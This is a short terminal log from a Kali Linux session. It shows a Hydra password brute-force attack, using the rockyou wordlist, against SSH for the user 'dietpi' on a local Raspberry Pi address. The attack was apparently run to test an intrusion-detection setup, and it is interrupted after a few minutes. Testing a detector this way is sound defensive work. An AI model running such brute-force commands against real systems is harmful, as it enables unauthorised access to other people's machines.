└─$ sudo ./timestamp.sh sudo hydra -l dietpi -P /usr/share/wordlists/rockyou.txt.gz -s 2222 ssh://192.168.0.100
Timestamp START: 03/20-02:58:15.032888531
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 02:58:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.0.100:2222/
 
[STATUS] 897.00 tries/min, 897 tries in 00:01h, 14343502 to do in 266:31h, 16 active
p [STATUS] 883.67 tries/min, 2651 tries in 00:03h, 14341748 to do in 270:30h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
Timestamp END: 03/20-03:01:22.799621864
                                                                                                                                
┌──(kali㉿kali)-[~/RASPBERRYPI-IDS-NAJNOWSZY/SSH_BRUTEFORCE]
└─$ 
